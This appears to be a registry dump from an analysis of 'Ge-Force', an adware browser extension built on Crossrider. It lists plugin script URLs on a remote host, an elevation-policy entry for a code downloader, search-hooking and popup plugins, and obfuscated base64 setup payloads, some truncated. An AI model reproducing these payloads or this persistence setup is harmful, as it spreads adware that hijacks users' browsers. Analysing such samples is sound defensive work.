    [HKCU\Software\Ge-Force\Plugins\43]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/43.js"

    [HKCU\Software\Ge-Force\Plugins\64]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\286]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/286.js"

    [HKCU\Software\Ge-Force\Plugins\72]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/72.js"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
    "69129" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\9]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\104]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU3MjU0NDI0YTU0NGIwNjExMGMxNTJkMDYwZTQ4NGU0OTRjMGQwYzExMDg0ZTRkNDUxNTE5MDc0YjEyMGExNDE4MWIxZDE1MDUwMjAwMGM0YjFiMWIwZjQ1MTUwZjA4MGMxNDBjMTkwMDA3NDUxNzA1MDcwMDE2MTE0NzEwMGIxOTAwNTQ1NjQzMTkxNTA4MmIwYjBlNDkzNjMxMjYyYTJhMmIyNzMwMjMzMDJjM2MzYTM0MmMzZjNjMzYzNTI3M2MyYzNhMzEyMTI3MmI0NDE5NDU1NDVlNDMwYjU3NDU0NDQ0MTk0NzU0NWU0MzE2MDQxNTExNWYzNTJiMmEzYzJhMmIzNjJhM2QyNjJmMjYzNjJmMzUyODNhMzYzNTJmMmYyYjM2NGM0OTcyNDU1ODU0NDI0ODFjMWQxYTE1MGIzMDBhMTg0MDUwNTQ0YjA2MTEwYzE1MGI0ZTRkNDUxNTE5MDc0YjEyMGExNDE4MWIxZDE1MDUwMjAwMGM0YjFiMWIwZjQ1MTUwZjA4MGMxNDBjMTkwMDA3NDUxNzA1MDcwMDE2MTE0NzEwMGIxOTAwNTQ1NjQzMTkxNTA4MmIwYjBlNDkzNjMxMjYyYTJhMmIyNzMwMjMzMDJjM2MzYTM0MmMzZjNjMzYzNTI3M2MyYzNhMzEyMTI3MmI0NDE5NDU1NDVlNDMwYjU3NDU0NDQ0MTk0NzU0NWU0MzE2MDQxNTExNWYzNTJiMmEzYzJhMmIzNjJhM2QyNjJmMjYzNjJmMzUyODNhMzYzNTJmMmYyYjM2NGM0OTcyNDU1ODU0NDI0ODA0MDUxYjAyMTEwYjMxMTA0MDUwNTQ1ODVlNTE3MjE4', 'extbjtinex'); }"

    [HKCU\Software\Ge-Force\Plugins\78]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Plugins\104]
    "Version" = "13"

    [HKCU\Software\Ge-Force\Plugins\177]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/177.js"

    [HKCU\Software\Ge-Force\Manifest]
    "ModeType" = "production"

    [HKCU\Software\Ge-Force\Plugins\350]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3MzRlNTI0NjVhNDAwZDAyMGUxYTJjMWMxZTQ0NDA0MjQ3MWUwZTFlMDk1NDVkNDkxOTA2MGI1ODE5MDUxNzFkMDYwMjFiMTYwNDE4MWYxZTU3MGQxZDBiNTUwYzAyMDMxYjFjMTg0MTFlNDgxMDExNWExNTFiMDcwOTBmMWIwMTE0MmIwMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZDMzMmIyYTNkMmMzMjI1MzU1ZjBkMWQxMzE0MTYxNzBmMzkwNTFkMGI0ZjM5MjUyMTM3MzkyOTM5MmIyNzM2MjMyODNkMjYzOTJmMjQyZDNjMmIzOTM5MmQyMTMzMjUzNTVmMGMwMDA5MGQxMTAwMDQzOTA1MWQwYjRmMzkyNTIxMzczOTI5MzkyYjI3MzYyMzI4M2QyNzI0MzUzZDJhMmIyMDM5MjU0NDA0MDYwYTIzM2Q1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyMzNkMzEyZDQwMWIxMjE1MzgxYjA3MWM1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyNDM4MjMzNzM5MjU0NDJjMzQzMzI5NDQzMTJkMjUyODJkMzYyNTI4MjMzZDJiMjAzOTMzMmMzNjIyM2IyNjM1MmIyMDM5MmYzMTIwMjQyNTIzM2QzMTJkNDAwOTE3MDczZjNlNTcyNjMxMzEzNDM1MzEzNjI0MzMyZTNjM2MyZDIzMjIzNjIwMzgzZTJmM2QzMTIxMzMzODNkMmMzMjI1MzU1ZjFjNGYzOTI1MzAyYjMyMjUzNTViNDI3ODQ2NWE0MjQ1NTQxMjFlMGQxZTAxMzMwODBlNDc0YzVhNDgxMTFhMDYxNjA5NTg0YTU5MWU1ODE4NTYxMzUyMGI1YjRiMDUwOTA2NTcwNjA1MDUxZTBjNGIxODFmMWU1NjAwMTUxMzFiMTQw"

    [HKCU\Software\Ge-Force\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\Ge-Force\Installer]
    "srcid" = "001729"

    [HKCU\Software\Ge-Force\Plugins\13]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/13.js"

    [HKCU\Software\Ge-Force\Installer]
    "ErrorsDomain" = "http://errors.newstatsclientcloud.com"

    [HKCU\Software\Ge-Force\Plugins\37]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/37.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Ge-Force\Plugins\36]
    "Name" = "IEBackground"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\180]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/180.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppName" = "Ge-Force-bg.exe"

    [HKCU\Software\Ge-Force\Plugins\356]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:MAN}))();};"

    [HKCU\Software\Ge-Force\Plugins\180]
    "Version" = "12"

    [HKCU\Software\Ge-Force\Plugins\41]
    "Version" = "7"

    [HKCU\Software\Ge-Force\Plugins\223]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/223.js"

    [HKCU\Software\Ge-Force\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKLM\SOFTWARE\Tempo]
    "(Default)" = "tempo"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\Ge-Force\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\Ge-Force\Plugins\273]
    "Version" = "6"

    [HKCU\Software\Ge-Force\Plugins\195]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\253]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\2]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\39]
    "Name" = "IEDatabase"

    [HKLM\SOFTWARE\Crossrider]
    "Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"

    [HKCU\Software\Ge-Force\Plugins\1]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/1.js"

    [HKCU\Software\Ge-Force\Plugins\4]
    "URL" = "http://js.newstatsclientcloud.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Ge-Force\Plugins\93]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MTY1NTcxZDE3MDEwMjM2MTUxOTQ5NTY1NTU3MGIwMTA2MTM1ZDVhNDQxYjAyMDI0ZDA2MDcxMzAyMDcwZDA1MDYxZDRkMTYxZDBlNDgwMjE4NDMwNjEzM2MxODEzMGEwOTViMDExZjA1NGEwNzE5MDEwYzEyMDcwODA5NDgxZDBiMDMwODBlMGUxZTFjNGEwMDA2MDYwNzNiMDc1YTE0MDkwZjUzMzYzNzNjMzY1ZTM4MmEyODNlM2EyNjMwMjczYjI3MjIyNzM0MjkyZDIxMjYzYjM2MjYyMzJhMzgzOTM3MmEyYTMxMmQzYzQxMDUwYTFlMDExYjA2MDcxYzAyMGExMDU2MzMyYTM2MzEzYTIxMzAzNTNjMmYyOTI3MmEyMjI1MjIzYzI5MzQyNjI5MmEyYTQxNTk3ODZhNDUxZDFmMTgwNTA2MzYwNzFlNDE1ZDU1NDkwNDAxMDExMzA2NDg0YzQ4MDIxYzFiNWIwNjE2MDUxNzExMDExYzE4MDQ1YjE2MGMxODVkMTQxNDVhMTgwYTJhMTgwMjFjMWM0ZDBkMDYxYjUzMTExOTEwMWEwNzExMDQxMDU2MDQxZDAzMTkxODFiMDgxMDUzMWUxZjEwMDcyYTExNGYwMjA1MTY0ZDJmMjEzYzI3NDgyZDNjMjQyNzI0M2YyNjI3MmEzMTM3MzEzODMwMzMzODMwM2IyNzMwMzYzYzM0MjAyOTMzM2MzMTNjMmE1NDEzMDYwNzFmMDIxMDA3MGQxNDFmMDY1YTJhMzQyZjI3M2EzMDI2MjAyYTIzMzAzOTMzMzQyNTMzMmEzYzIyMmEzMDM0MzM1NzU5Njk3YzUwMTMwYjAwMGMwNTFiM2MwNzU3NDg0MzVlNDY2MTEx', 'ukluucurcg'); }"

    [HKCU\Software\Ge-Force\Plugins\286]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2YjU2NTU1MTQ4NTcwYTAyMDQxYTM0MDQxOTUzNTI1NTQwMWUwNDFlMTE0YzVhNWUwYjExMGM1ODEzMDUwZjA1MDExNTA5MDEwMzE4MTUxZTRmMTUxYTFjNDcwNjEyNTkxYTFiNGYxYzA2NGUwYjE0MGYwNjExMDMwNjE4M2MxNTU1MmEzZDM1MjIyNTMyMjUyNzM4MmMzMDMwMjkzMzJiMmMyNjJhMzgyYzJhM2Q1MDEzMDUxNDE4MDEwMzExMzYwZDEyMTU1NzNlMjkzNjIzMjcyNjMxMjQzOTJlMjQyNDJhMzIyNzIwMmMyMjIyMzMzZTM1M2EzNTJkMmEzZDUwMTExYTExMzgxNDFjMGQ0ODNkMjkzMzM4MmUyNTI2MjMyMTMxMjcyNDJmMmIzMTI2MmEzZjI5MzgyNzI5MmY0ODRkN2M1NTUxNDg1NTQwMWUwNDFlMTEwNTIwMDMwNDU3NTg1NjUyMDIxNTAyMDUwMjUyNWE0ZDEyNDIwYjU5MTc0MTAwNTE1YjExMDUxYzQ0MDkwMTE2MTUwNjViMGMxMzA0NDUxMjA2NWExYjE5NWIwODA1NGYwOTAwMWIwNTEwMDExMjBjM2YxNDU3M2UyOTM2MjMyNzI2MzEyNDM5MmUyNDI0MmEzMjI5MzgzMjI5MzkyZTNlMjk1MzEyMDcwMDBjMDIwMjEzMjIxOTExMTQ1NTJhM2QzNTIyMjUzMjI1MjczODJjMzAzMDI5MzMyNTM0MzgyMTIzMzEyYTIxMzkzNDJmM2UyOTUzMTAxODA1MmMxNzFkMGY1YzI5MmEzMjNhM2EzMTI1MjIyMzI1MzMyNzJlMjkyNTMyMjkzZTJiMmMzMzJhMmU0YTU5Njg1NjUwNGE0MTU0MDUxZDFkMTIwYjE4MzkwZTQzNGM1NTQzNTA0MzY4MGI=', 'javuqhubvp'); }"

    [HKCU\Software\Ge-Force\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\Ge-Force\Plugins\195]
    "Version" = "28"

    [HKCU\Software\Ge-Force\Plugins\46]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/46.js"

    [HKCU\Software\Ge-Force\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\Ge-Force\Plugins\356]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\14]
    "Version" = "11"

    [HKCU\Software\Ge-Force\Plugins\301]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/301.js"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppName" = "Ge-Force-codedownloader.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\Ge-Force\Plugins\200]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/200.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
    "DisplayName" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elR"

    [HKCU\Software\Ge-Force\Plugins\37]
    "Version" = "6"

    [HKCU\Software\Ge-Force\Manifest]
    "UpdateInterval" = "360"

    [HKCU\Software\Ge-Force\Plugins\43]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Installer]
    "osName" = "XP32"

    [HKCU\Software\Ge-Force\Plugins\223]
    "Version" = "9"

    [HKCU\Software\Ge-Force\Plugins\177]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\36]
    "Version" = "8"

    [HKCU\Software\Ge-Force\Manifest]
    "PublisherName" = "iWebar"

    [HKCU\Software\Ge-Force\Plugins\183]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\Ge-Force\Plugins\263]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-聓"

    [HKCU\Software\Ge-Force\Plugins\200]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }"

    [HKCU\Software\Ge-Force\Plugins\281]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"

    [HKCU\Software\Ge-Force\Plugins\94]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/94.js"

    [HKCU\Software\Ge-Force\Installer]
    "subid" = "0"

    [HKCU\Software\Ge-Force\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi"

    [HKCU\Software\Ge-Force\Plugins\253]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/253.js"

    [HKCU\Software\Ge-Force\Plugins\221]
    "Name" = "icm_downloads_m"

    [HKCU\Software\Ge-Force\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\Ge-Force\Plugins\288]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }"

    [HKCU\Software\Ge-Force\Plugins\337]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/337.js"

    [HKCU\Software\Ge-Force\Plugins\288]
    "Version" = "1"

    [HKCU\Software\Ge-Force\Plugins\21]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/21.js"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
    "Installed" = "1"

    [HKCU\Software\Ge-Force\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\Ge-Force\Plugins\262]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIw"

    [HKCU\Software\Ge-Force\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,177,91,28"

    [HKCU\Software\Ge-Force\Plugins\7]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\246]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/246.js"

    [HKCU\Software\Ge-Force\Plugins\47]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\221]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/221.js"

    [HKCU\Software\Ge-Force\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\Ge-Force\Plugins\93]
    "Version" = "14"

    [HKCU\Software\Ge-Force\Plugins\273]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }"

    [HKCU\Software\Ge-Force\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\Ge-Force\Plugins\17]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\263]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/263.js"

    [HKCU\Software\Ge-Force\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\Ge-Force\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Ge-Force\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\Ge-Force\Manifest]
    "Name" = "Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\180]
